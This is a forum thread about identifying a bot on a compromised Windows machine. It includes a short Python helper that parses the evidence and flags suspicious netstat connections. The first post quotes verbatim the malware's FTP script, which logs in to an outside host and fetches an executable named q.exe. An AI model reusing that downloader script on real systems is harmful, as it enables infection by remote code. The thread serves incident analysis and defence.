Anybody recognize this bot?

(@dungeoncrawl)
New Member
Joined: 18 years ago
Posts: 4
Topic starter  

I've got a system that I know is infected with some type of bot but can't identify specifically which one. Symptoms are as follows

1) A file called C:\Program Files\Symantec Antivirus\mime.txt exists on my system with the following contents:

Open fjht.3322.org
644
644
get q.exe
bye

2) When the infected system is on a network with Internet connectivity, I see all kinds of ports opening outbound to an IP located in the Asia Pacific region destined for port 80. Using fport and netstat -ano shows that they map to PID 0 and user "System".

3) In #1 above, the file creation time of the mime.txt file is just before a bogus user gets added to the system per my Event Logs.

4) Finally, near that same timestamp, there is a file called C:\Program Files\Symantec Antivirus\m.exe.

Pretty clear the system has been owned. However, I'd like to be able to determine how this system was compromised. Any thoughts?


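As an added example (not code from the thread), a small Python triage helper for the two artefacts described in the first post: it summarises the FTP command script found in mime.txt (host, the two credential lines, files fetched) and flags `netstat -ano` connections to remote port 80 that map to PID 0. The netstat lines and IP addresses are constructed placeholders, not values from the post.

```python
import re

# Constructed sample: the FTP script contents quoted in the first post.
MIME_TXT = """Open fjht.3322.org
644
644
get q.exe
bye
"""

# Constructed sample of `netstat -ano` output (placeholder addresses).
NETSTAT_ANO = """Proto  Local Address      Foreign Address     State        PID
TCP    192.0.2.10:1043    198.51.100.7:80     ESTABLISHED  0
TCP    192.0.2.10:1044    198.51.100.7:80     SYN_SENT     0
TCP    192.0.2.10:1050    203.0.113.5:443     ESTABLISHED  1432
TCP    0.0.0.0:445        0.0.0.0:0           LISTENING    4
"""

FTP_CMDS = {"open", "user", "get", "mget", "put", "bye", "quit", "binary", "cd"}

def parse_ftp_script(text):
    """Summarise an FTP command script: target host, credential lines, files fetched."""
    info = {"host": None, "creds": [], "fetched": []}
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    for i, line in enumerate(lines):
        parts = line.split()
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) > 1:
            info["host"] = parts[1]
            # Bare lines following 'open' are the username and password
            info["creds"] = [l for l in lines[i + 1:i + 3]
                             if l.split()[0].lower() not in FTP_CMDS]
        elif cmd in ("get", "mget") and len(parts) > 1:
            info["fetched"].extend(parts[1:])
    return info

def suspicious_connections(netstat_text, remote_port=80):
    """Return non-listening TCP entries to remote_port whose owning PID is 0.

    A live outbound connection attributed to PID 0 is the anomaly the post
    describes; a normal user-mode process would show its own PID here.
    """
    hits = []
    for line in netstat_text.splitlines():
        m = re.match(r"\s*TCP\s+(\S+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$", line)
        if not m:
            continue
        local, rhost, rport, state, pid = m.groups()
        if state != "LISTENING" and int(rport) == remote_port and int(pid) == 0:
            hits.append({"local": local, "remote": f"{rhost}:{rport}", "state": state})
    return hits
```

Running both helpers over a real mime.txt and a saved `netstat -ano` capture gives the host, fetched file names and anomalous connections to record before the system is powered off.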
(@mialta)
Eminent Member
Joined: 18 years ago
Posts: 27
 

A quick Google search found this likely suspect:

Psyme Trojan

http://www.symantec.com/security_response/writeup.jsp?docid=2004-040112-5204-99&tabid=2


(@dungeoncrawl)
New Member
Joined: 18 years ago
Posts: 4
Topic starter  

Yeah… I had seen that too but never could find ANY details about how it works, how it acts, etc. Other than the m.exe and the q.exe, there's nothing to suggest it really is Psyme.

Especially that strange mime.txt file and its content.


(@rossetoecioccolato)
Eminent Member
Joined: 18 years ago
Posts: 34
 

> However, I'd like to be able to determine how this system was compromised.

If you have shut the system down since the compromise, forget it. Reformat and reinstall with the latest updates. If you haven't rebooted, acquire the memory from the system. It may still be possible to find the entry point. Without the memory there is no way of knowing what was done before installing your bot. Multifunction malware is common: steal your credit card numbers and encryption keys and then install spyware/adware. You are seeing the end result but probably not what led to this state.

> C:\Program Files\Symantec Antivirus\mime.txt

Antivirus is a common entry point vector nowadays so maybe this is a clue. The real malware might be running inside of Symantec.

